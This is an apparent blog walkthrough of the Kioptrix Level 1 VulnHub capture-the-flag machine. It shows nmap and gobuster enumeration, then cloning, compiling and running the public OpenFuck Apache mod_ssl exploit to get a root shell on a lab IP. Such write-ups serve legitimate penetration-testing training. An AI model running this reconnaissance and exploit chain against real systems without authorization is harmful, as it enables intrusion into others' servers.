Kioptrix: Level 1 (#1) Walkthrough
--
Vulnhub is a platform that provides with VM(virtual machine) images,which are vulnerable by-design and help to gain practical hands-on experience in Pentesting.
Kioptrix is series of CTF(Capture The Flag) like VM’s ,where need to gain root privileges on the machine. Kioptrix is a boot2rooot machine.
Link to the image file:
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/Enumeration:
So,now we need to know the Internal IP address of the Kioptrix machine so we the command in the terminal:
netdiscover
Nmap Scan:
nmap -sC -sV 192.168.0.102
Port 22:
We tried ssh but didn't succeed as its asking for password so lets enumerate further.Later we shall also try brute-forcing ssh using “Hydra”.
Port 80:
Visiting the webpage we see a default Apache Test page.
http://192.168.0.102:80So,letz run Gobuster in the background and search for hidden directories.
gobuster dir -u http://192.168.0.102 -w /opt/DirBuster Lists/directory-list-2.3-medium.txtbut didn't find any interesting directories. :(
Port 443:
While vising the page it shows us:
As port 443 is used for HTTPS(Hyper Text Transfer Protocol Secure) we need to add “https://” in the URL section.
Searching on google for exploits of Apache:
We get an publicly available exploit on Exploit-db.
On seeing the note section(1st line) of the exploit it directs us to the updated exploit.
The link to the updated exploit:
https://www.exploit-db.com/exploits/47080
But due to some reasons even the updated exploit has some corrections in the code.
We have have a working exploit on the github.
https://github.com/exploit-inters/OpenFuckEXPLOITATION:
Letz git clone the repository.
git clone https://github.com/heltonWernik/OpenFuck.gitNow we need to install the dependent library for the exploit.
apt-get install libssl-devAfter unpacking letz see the contents;
cd OpenFuck/
Its Compile Time:
gcc -o exploit OpenFuck.c -lcryptogcc : GNU Compiler Collections is used to compile the programs written in C and C++
o : the file name to place the output into
Its time to run the exploit:
./exploitNow the exploit shows the various versions of Apache Server and the Operating system.From our nmap scan we get to know our OS and the Apache service version.
Corresponding to each version we have a label for it.
So our label on the given services is “0x6b”
Let run the exploit with specified label:
./exploit 0x6b 192.168.80.145 443 -c 40Huraay ! we got the shell
idAnd we already are the root.
So, this was a beginner boot2root machine of the Kioptrix series.Gaining a root on the machine releases “dopamine” which makes you happy and you feel motivated for solving the next VM’s too.This kind of spirit and motivation is needed everyday inorder to grow in this Infosec field.As this field is all about learning each-day.
